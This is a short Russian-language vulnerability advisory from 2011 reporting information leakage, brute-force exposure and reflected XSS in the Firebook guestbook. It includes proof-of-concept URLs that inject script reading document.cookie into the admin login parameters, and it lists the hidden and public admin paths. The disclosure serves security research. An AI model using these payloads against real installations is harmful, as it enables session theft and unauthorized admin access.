Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25639
HistoryFeb 11, 2011 - 12:00 a.m.

Многочисленные уязвимости в Firebook

2011-02-1100:00:00
vulners.com
22

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Information Leakage, Brute Force и Cross-Site Scripting уязвимостях в Firebook.

Information Leakage (WASC-13):

http://site/cgi-bin/firebook/firebook.cgi

На странице есть раздел SystemInfo с Full path disclosure и именами txt-файлов БД веб приложения.

Brute Force (WASC-11):

http://site/path_to_firebook_admin/ (скрытая админка)

http://site/admin/index.html?account=in (публичная админка)

XSS (WASC-08):

http://site/path_to_firebook_admin/?Name=%3Cscript%3Ealert(document.cookie)%3C/script%3E&Word=1&PutWord=1 (скрытая админка)

http://site/admin/index.html?NAME=%3Cscript%3Ealert(document.cookie)%3C/script%3E&PASS=1&action=AccountIn (публичная админка)

Уязвимы Firebook 3.100328 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4717/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua